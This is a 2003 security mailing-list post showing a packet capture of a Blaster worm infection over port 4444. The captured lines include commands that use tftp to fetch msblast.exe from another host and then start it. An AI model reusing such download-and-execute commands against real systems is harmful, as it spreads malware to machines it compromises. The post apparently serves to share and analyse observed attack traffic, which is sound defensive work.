T 2003/08/11 16:09:49.592427 12.82.141.200:1080 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:09:49.752452 12.82.141.200:1080 -> 12.82.140.147:4444 [AP]
74 66 74 70 20 2d 69 20 31 32 2e 38 32 2e 31 34 tftp -i 12.82.14
31 2e 32 30 30 20 47 45 54 20 6d 73 62 6c 61 73 1.200 GET msblas
74 2e 65 78 65 0a t.exe. 
#
T 2003/08/11 16:09:50.102490 12.82.141.200:1080 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:10:10.704598 12.82.141.200:1080 -> 12.82.140.147:4444 [AP]
73 74 61 72 74 20 6d 73 62 6c 61 73 74 2e 65 78 start msblast.ex
65 0a e. 
exit




- John
-- 
"Obviously, we do not want to leave zombies around."

_______________________________________________
list mailing list
list at dshield.org
http://www.dshield.org/mailman/listinfo/list



---------------------------------
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software


More information about the list mailing list